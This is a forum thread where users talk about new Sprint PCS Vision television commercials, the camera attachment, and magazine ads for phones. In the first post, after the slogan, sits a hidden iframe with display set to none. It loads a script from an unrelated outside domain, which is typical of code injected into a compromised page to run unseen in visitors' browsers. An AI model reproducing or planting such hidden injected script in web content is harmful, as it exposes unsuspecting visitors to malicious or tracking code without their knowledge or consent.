+ Reply to Thread
    Administrator

The PCS Vision Commercials are out!

i have been here watching Star Trek: TNG and for the last 2 commercial breaks i have seen 2 different pcs vision commercials with the sprint pcs guy and the guy and girl that do the radio shack commercials...

atleast they are pusing it out there to the public... they are using that phone with the screen on the top inside lid when you open it up... (i forget which phone it is, but yuo guys know)

they are promoting the camera attachement thingy also..

the "sprint pcs you can see..." is the slogan... <iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

PHO
    Broward County Florida, "Home of the Hanging Chad"
    Yeah they have been running for at least a week or so in SOuth Florida. I have noticed they haven't said High Speed Network they just say advanced or something like that.

Seems to me that they are marketing this the right way. Whereas i was expecting SPEED they are now just saying "neat stuff, like send pictures" however if the cam is worth a damn it will take FOREVER to send a photo

Is it football season yet?

A
    Please check out my new radio show - you can listen live online Saturdays from 9-10am

www.grtalk.com

"Aaron the Research Dept."

Administrator

Arrow

not yet..

yeah they are hitting the masses.. not just us bleeding edge'ers... they want the soccer moms to take advantage of it...

I saw the I330 in an ad in Newsweek today. They featured non-detailed shots of a number of phones and the I330 was shown with a kid playing a game on it next to the word "games." I'm pretty sure thats what the setting was, but am certain it was the I330.

I saw the camera at a Sprint PCS store. It's very low resolution, so actually, it will transmit quickly, I guess.

Is that good or bad news?

-Jerry